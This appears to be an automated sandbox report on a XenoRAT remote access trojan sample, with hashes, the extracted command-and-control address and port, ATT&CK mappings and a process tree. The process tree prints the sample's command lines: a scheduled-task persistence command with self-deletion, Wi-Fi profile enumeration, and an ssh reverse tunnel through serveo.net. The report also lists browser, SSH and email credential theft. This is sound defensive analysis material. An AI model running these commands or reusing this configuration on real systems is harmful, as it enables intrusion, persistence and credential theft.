xenorat | 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff

Analysis

max time kernel
299s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
26-09-2024 22:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Size

9.1MB
MD5

1bafb4856a31ae27271fbd2ee1574a4f
SHA1

b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
SHA512

e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
SSDEEP

3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D

Score

10^/10

xenorat collection discovery persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xenorat

193.149.187.135

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
appdata
port
4444
startup_name
mswindow

Signatures

Detect XenoRat Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ac47-131.dat	family_xenorat
behavioral2/memory/4368-133-0x0000000000D30000-0x0000000000D44000-memory.dmp	family_xenorat
behavioral2/memory/4532-144-0x00000000058A0000-0x00000000058AC000-memory.dmp	family_xenorat

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1568	ssh.exe
4236	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
4368	manager.exe
4532	manager.exe
2116	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1096	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
2884	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1368	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Loads dropped DLL 1 IoCs

pid	Process
1568	ssh.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ssh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	manager.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	manager.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2352	cmd.exe
1936	netsh.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4368	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4600	schtasks.exe
2140	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe
4532	manager.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4532	manager.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3652	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	4236	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	4532	manager.exe
Token: SeDebugPrivilege	2116	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	1096	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	2884	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	1368	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
4532	manager.exe
2884	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 3652 wrote to memory of 1096	3652	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	73
PID 3652 wrote to memory of 1096	3652	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	73
PID 1096 wrote to memory of 3320	1096	cmd.exe	75
PID 1096 wrote to memory of 3320	1096	cmd.exe	75
PID 1096 wrote to memory of 4368	1096	cmd.exe	76
PID 1096 wrote to memory of 4368	1096	cmd.exe	76
PID 1096 wrote to memory of 4600	1096	cmd.exe	77
PID 1096 wrote to memory of 4600	1096	cmd.exe	77
PID 1096 wrote to memory of 372	1096	cmd.exe	78
PID 1096 wrote to memory of 372	1096	cmd.exe	78
PID 372 wrote to memory of 2352	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	79
PID 372 wrote to memory of 2352	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	79
PID 2352 wrote to memory of 1944	2352	cmd.exe	81
PID 2352 wrote to memory of 1944	2352	cmd.exe	81
PID 2352 wrote to memory of 1936	2352	cmd.exe	82
PID 2352 wrote to memory of 1936	2352	cmd.exe	82
PID 2352 wrote to memory of 916	2352	cmd.exe	83
PID 2352 wrote to memory of 916	2352	cmd.exe	83
PID 372 wrote to memory of 3312	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	84
PID 372 wrote to memory of 3312	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	84
PID 3312 wrote to memory of 4324	3312	cmd.exe	86
PID 3312 wrote to memory of 4324	3312	cmd.exe	86
PID 3312 wrote to memory of 4244	3312	cmd.exe	87
PID 3312 wrote to memory of 4244	3312	cmd.exe	87
PID 3312 wrote to memory of 524	3312	cmd.exe	88
PID 3312 wrote to memory of 524	3312	cmd.exe	88
PID 372 wrote to memory of 1568	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	90
PID 372 wrote to memory of 1568	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	90
PID 372 wrote to memory of 1568	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	90
PID 372 wrote to memory of 4368	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	93
PID 372 wrote to memory of 4368	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	93
PID 372 wrote to memory of 4368	372	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	93
PID 4368 wrote to memory of 4532	4368	manager.exe	94
PID 4368 wrote to memory of 4532	4368	manager.exe	94
PID 4368 wrote to memory of 4532	4368	manager.exe	94
PID 4532 wrote to memory of 2140	4532	manager.exe	95
PID 4532 wrote to memory of 2140	4532	manager.exe	95
PID 4532 wrote to memory of 2140	4532	manager.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
"C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 3
    3⤵
    - Delays execution with timeout.exe
    PID:4368
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4600
- - C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
    "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - outlook_office_path
    - outlook_win_path
    PID:372
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1944
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1936
    - - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:916
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3312
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4324
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4244
    - - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:524
  - - C:\Users\Admin\AppData\Local\Starlabs\OpenSSH-Win32\ssh.exe
      "C:\Users\Admin\AppData\Local\Starlabs\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6989 serveo.net
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1568
  - - C:\Users\Admin\AppData\Roaming\manager.exe
      "C:\Users\Admin\AppData\Roaming\manager.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4368
    - - C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe
        
        "C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4532
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\Admin\AppData\Local\Temp\tmp43DA.tmp" /F
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2140

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2884

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe.log

Filesize
847B

MD5
a908a7c6e93edeb3e400780b6fe62dde

SHA1
36e2b437f41443f6b41b45b35a0f97b2cd94123d

SHA256
cae801b0499949178298c1c1a083f7c0febb971d262be9c9588437af66c76ef0

SHA512
deb437dcb1440d37bcd61dfa43be05fd01856a1d1e59aa5b2dfa142e9ae584b0577eea024edb99d8e74e3a1b606bb7ae3b4f9cd8eb30813e67dda678b9319cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\manager.exe.log

Filesize
226B

MD5
957779c42144282d8cd83192b8fbc7cf

SHA1
de83d08d2cca06b9ff3d1ef239d6b60b705d25fe

SHA256
0d7ca7ba65e2b465e4878e324ceab8f8981f5ec06dcf5bc32559a4467a9c7d51

SHA512
f1549c61b4f2906d13b2aabb74772c2bc826cd42373d7bb6c48cbb125d5aa2ec17617e6b5e67e8aae3bb5790cc831cdba48a45008ed01df4fba8be448cce39fd

Download Submit
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Filesize
9.1MB

MD5
1bafb4856a31ae27271fbd2ee1574a4f

SHA1
b8b3649d959524df2c4e8a94434fc0de90f95005

SHA256
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff

SHA512
e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25

Download Submit
C:\Users\Admin\AppData\Local\Starlabs\OpenSSH-Win32\libcrypto.dll

Filesize
1.5MB

MD5
79a6e2268dfdba1d94c27f4b17265ff4

SHA1
b17eed8cb6f454700f8bfcfd315d5627d3cf741c

SHA256
6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

SHA512
3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Download Submit
C:\Users\Admin\AppData\Local\Starlabs\OpenSSH-Win32\ssh.exe

Filesize
914KB

MD5
d1ce628a81ab779f1e8f7bf7df1bb32c

SHA1
011c90c704bb4782001d6e6ce1c647bf2bb17e01

SHA256
2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

SHA512
de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp43DA.tmp

Filesize
1KB

MD5
ff43295eab0b6d30700cf545b83b6a4f

SHA1
84dc1111c2387fe2a378ac40d5eb80755de8a833

SHA256
ab95865908354ee888dd2ef3dd7b39edd6174fdbd1cb049fe7b3050830640908

SHA512
cefb28d7e12adf06f9565df8a9c20b39f6ee9e180c168ab449d376aaa8828faa4a9276b8f1c06b6a8761a076a18dd665eb0cc28837e8c5fa617123f09f935302

Download Submit
C:\Users\Admin\AppData\Local\phgsswc3mw\p.dat

Filesize
4B

MD5
f1404c2624fa7f2507ba04fd9dfc5fb1

SHA1
a17c3e6ca0d2c34f8db9cb4d59a0733e888986a7

SHA256
88c821898c75be84224d9a912d93bbafd03c098670a8c6ce455e0ede30fa8830

SHA512
11f4b213828050c1fc30bd0d618e93663627e367967d5e9ff2afe1feb78c8a19db8ab38f6d976b4f6e48d61922bc873550c4367086f2755a996b1aff2d3c3c48

Download Submit
C:\Users\Admin\AppData\Roaming\manager.exe

Filesize
51KB

MD5
da118f70d089dabfab1b43b4cd87db65

SHA1
6d7def883519e1099aa18c6ac2e1357edc7ea685

SHA256
7788f402faf2c2221307b0c90b7c97b2235d324abe07ec3965a6c21b33c0b70e

SHA512
7a78bbe0eb437bfaba85ee2513d1ccfca65b70e2e33187197d5891ddee42be453d9cadd883b171304135ee0679220e6c88c854572e41378c7968318908eaad3e

Download Submit
memory/3652-6-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/3652-4-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/3652-1-0x0000021720880000-0x00000217208A6000-memory.dmp

Filesize
152KB

Download
memory/3652-0-0x00007FFFA44F3000-0x00007FFFA44F4000-memory.dmp

Filesize
4KB

Download
memory/4368-133-0x0000000000D30000-0x0000000000D44000-memory.dmp

Filesize
80KB

Download
memory/4532-143-0x0000000005D10000-0x0000000005D76000-memory.dmp

Filesize
408KB

Download
memory/4532-144-0x00000000058A0000-0x00000000058AC000-memory.dmp

Filesize
48KB

Download
memory/4532-145-0x0000000006640000-0x0000000006B3E000-memory.dmp

Filesize
5.0MB

Download
memory/4532-146-0x00000000061E0000-0x0000000006272000-memory.dmp

Filesize
584KB

Download
memory/4532-147-0x0000000006190000-0x000000000619A000-memory.dmp

Filesize
40KB

Download